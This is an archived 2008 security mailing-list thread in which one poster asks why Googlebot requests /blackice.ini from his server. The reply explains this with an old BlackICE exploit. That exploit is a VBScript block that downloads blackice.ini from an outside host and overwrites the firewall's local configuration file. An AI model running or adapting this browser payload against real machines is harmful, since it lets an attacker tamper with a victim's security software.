[Dailydave] Google Robot and Black ICE

Kevin Finisterre (lists) kf_lists at digitalmunition.com
Thu Feb 21 00:34:55 EST 2008 

My friend have you forgotten our old Black Ice exploit? God... I had  
to search my spool for the lulz as they say.

<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini",  
adSaveCreateOverwrite
</script>
maybe this will refresh your memory:

"I would like to see a panel discussion about the disclosure of lame
bugs; I am probably going to submit a white paper on it to an upcoming
conference.

We do not get too concerned about local Window's BO, unless they are in
IE, Outlook, etc that would allow for a network vector for compromise.
On a system that is more commonly deployed as a multi-user system
(unix,linux), of course we consider a local priv escalation serious and
provide protection in our host based products.

We have about 15,000 corporate customers, including most of the fortune
1000, and in my six years at ISS not a single one has asked me for our
products to detect or stop a local windows BO (besides IE or Outlook). I
am responsible for every signature in all our products."

can you name that quote? heh
-KF


On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:

> Greetings,
> 	I was just looking over some IDS events and noticed that Google  
> keeps looking for blackice.ini on one of our web servers. Does  
> anyone have any idea as to why Google would be doing this? This  
> happens on average 3-5 times a day. Nothing critical, just curious.  
> Every time Google tries the request is denied.
>
> Event:
> ------
> Blocked access to : /blackice.ini
> Reason		  : URL file extension is restricted by policy
> SOURCE IP	  : crawl-66-249-73-113.googlebot.com
> Detected On	  : Web Server Logs, NIDS, Firewall Logs
>
>
>
>
> -- 
>
> Regards,
> 	Adriel T. Desautels
> 	Chief Technology Officer
> 	Netragard, LLC.
> 	Office : 617-934-0269
> 	Mobile : 617-633-3821
> 	http://www.linkedin.com/pub/1/118/a45
>
> 	Join the Netragard, LLC. Linked In Group:
> 	http://www.linkedin.com/e/gis/48683/0B98E1705142
>
> ---------------------------------------------------------------
> Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
> Penetration Testing, Vulnerability Assessments, Website Security
> <adriel.vcf>_______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080221/dcf13de7/attachment.htm

More information about the Dailydave mailing list